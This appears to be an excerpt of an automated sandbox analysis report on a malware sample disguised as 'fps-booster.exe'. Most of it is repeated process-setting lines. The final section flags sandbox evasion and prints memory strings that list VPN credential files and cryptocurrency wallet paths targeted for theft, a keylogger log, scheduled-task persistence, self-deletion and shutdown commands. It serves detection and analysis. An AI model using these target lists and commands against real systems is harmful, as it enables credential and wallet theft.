        Source: Binary string: System.Windows.Forms.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: mscorlib.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbT source: fps-booster.exe, 00000000.00000002.2491962230.0000000008F7F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Drawing.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.Management.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: mscorlib.ni.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.Management.ni.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: fps-booster.exe, 00000000.00000002.2491192171.0000000008632000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb< source: fps-booster.exe, 00000000.00000002.2491962230.0000000008F7F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Desktop\fps-booster.PDB source: fps-booster.exe, 00000000.00000002.2490642163.00000000085A3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbN source: fps-booster.exe, 00000000.00000002.2490642163.00000000085A3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb7 source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.ni.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.Core.ni.pdbRSDS source: WEREA8F.tmp.dmp.6.dr

        Data Obfuscation

        barindex
        .NET source code contains potential unpacker
        Source: 0.2.fps-booster.exe.b240000.3.raw.unpack, DynamicUtils.cs.Net Code: CreateSharpArgumentInfoArray
        Source: 0.2.fps-booster.exe.b240000.3.raw.unpack, LateBoundReflectionDelegateFactory.cs.Net Code: CreateDefaultConstructor
        Source: C:\Users\user\Desktop\fps-booster.exeCode function: 0_2_0B2F5E22 pushad ; ret 0_2_0B2F5E36
        Source: C:\Users\user\Desktop\fps-booster.exeCode function: 0_2_0B2FB77E push cs; retf 0_2_0B2FB77F
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_049A6D6E push ecx; ret 2_2_049A6D74
        Source: fps-booster.exeStatic PE information: section name: .text entropy: 7.997901129081752
        Source: C:\Users\user\Desktop\fps-booster.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Query firmware table information (likely to detect VMs)
        Source: C:\Users\user\Desktop\fps-booster.exeSystem information queried: FirmwareTableInformationJump to behavior
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PASSWORD: /VPN/CRYPTICVPN/NORDVPNNORDVPN.EXE*USER.CONFIG/VPN/NORDVPN///SETTING[@NAME='USERNAME']/VALUE//SETTING[@NAME='PASSWORD']/VALUE/VPN/NORDVPN//ACCOUNTS.TXTOPENVPN CONNECT/PROFILES/VPN/OPENVPNOVPNPROTONVPNPROTONVPN.EXE/VPN/PROTONVPN\USER.CONFIG/ARMORY//WALLETS/ARMORY//ATOMIC/LOCAL STORAGE/LEVELDB//WALLETS/ATOMIC/LOCAL STORAGE/LEVELDB/SOFTWAREBITCOINBITCOIN-QT/WALLETS/BITCOINCORE/STRDATADIR\WALLET.DAT/WALLETS/BITCOINCORE/WALLET.DAT/BYTECOIN/WALLETS/BYTECOIN/.WALLET\COINOMI\COINOMI\WALLETS/WALLETS/COINOMI//WALLETS/COINOMI/WALLETS/DASHDASH-QT/WALLETS/DASHCORE//WALLETS/DASHCORE/WALLET.DAT/ELECTRUM/WALLETS/WALLETS/ELECTRUM//ETHEREUM/KEYSTORE/WALLETS/ETHEREUM/\EXODUS\EXODUS.WALLET\/WALLETS/EXODUS/\GUARDA\LOCAL STORAGE\LEVELDB/WALLETS/GUARDA//WALLETS/GUARDA/WALLETS/LOCAL STORAGE/LEVELDB\COM.LIBERTY.JAXX\INDEXEDDB\FILE__0.INDEXEDDB.LEVELDB\/WALLETS/JAXX/COM.LIBERTY.JAXX/INDEXEDDB/FILE__0.INDEXEDDB.LEVELDB/LITECOINLITECOIN-QT/WALLETS/LITECOINCORE//WALLETS/LITECOINCORE/WALLET.DATC:\USERS\\APPDATA\LOCAL\MICROSOFT\EDGE\USER DATA\DEFAULT\LOCAL EXTENSION SETTINGS\EJBALBAKOPLCHLGHECDALMEEEAJNIMHM\/WALLETS/METAMASK//WALLETS/METAMASK/EDGE/\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL EXTENSION SETTINGS\NKBIHFBEOGAEAOEHLEFNKODBEFGPGKNN\/WALLETS/METAMASK/CHROME/\APPDATA\LOCAL\BRAVESOFTWARE\BRAVE-BROWSER\USER DATA\DEFAULT\LOCAL EXTENSION SETTINGS\NKBIHFBEOGAEAOEHLEFNKODBEFGPGKNN\/WALLETS/METAMASK/BRAVE/MONERO-PROJECTMONERO-CORE/WALLETS/MONERO/WALLET_PATH//ZCASH//WALLETS/ZCASH/BCDFGHJKMPQRTVWXY2346789N-SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSIONDIGITALPRODUCTIDFAILED TO GET DIGITALPRODUCTID FROM REGISTRYSFGIEKRUY48W37IEOKGUF\[]SPACERETURN [ENTER]SFGIEKRUY48W37IEOKGUF\KEYLOGGER.TXTWINDOW: TIME: YYYY-MM-DD H:MM:SS TTLOGGED DATA:DUCKLOGS:WVJ5TBR0+D9BYD9PP4S3XVCHCROXOUKJDLFK1HOP7GEYGKEWAVE7UANF20KHYVOVIMOBGHDTO6RDC0CASY3VCA==DUCKLOGS:ALOWPSK5RQBOGM5OIVEKOQ==DUCKLOGS:XORKNPUSMVMNNSLNRA0M9RV7N59NS4HQVIL5XMI9PQYFSPFGR0Z1FEXQ+7Y+U10UDUCKLOGS:ZXRFSEYBYEJ1YPJQKALCJG==DUCKLOGS:WVJ5TBR0+D9BYD9PP4S3XVCHCROXOUKJDLFK1HOP7GEYGKEWAVE7UANF20KHYVOVENZ675MVKPSVETZRMCP2RG==DUCKLOGS:JWCXNMNIEY57YP2JRFZQFA==DUCKLOGS:TVFP7NPOSI/LWZJERYN8DUNLKSHHOMJSNDF9HITBUKY=\GOOGLEUPDATE.EXE/CREATE /F /SC ONLOGON /RL HIGHEST /TN "" /TR "/DELETE /F /TN "SCHTASKS.EXEDUCKLOGS:6W3G3QOCADOQC2NITAKT/UIQNXFB8STCVUM7GRSUGHG=DUCKLOGS:DGQUXONSHBLXGHJOHZMR3W==DUCKLOGS:AHGBSCUXIPO0LNFE6LRD+G==STATUSFAILEDACTIONEXECUTEGETCONTENTTOFILEDUCKLOGS:YWROJQF7+XGLHFNUKOPVCW==DESTRUCTDUCKLOGS:ZQW2I2NH/8BEWRY5V7KLUG==/SFGIEKRUY48W37IEOKGUFC:\USERS\PUBLIC.BAT:LTASKLIST /FI "PID EQ " | FIND ":"IF ERRORLEVEL 1 ( TIMEOUT /T 1 /NOBREAK GOTO LRMDIR /S /Q "/C & DEL CMD.EXEMESSAGEMESSAGELINKPOWERSHUTDOWN/S /F /T 0RESTART/R /F /T 0LOGOUTDUCKLOGS:IKRT5VGY2BFDKA3ZJGO3DG==/C SHUTDOWN 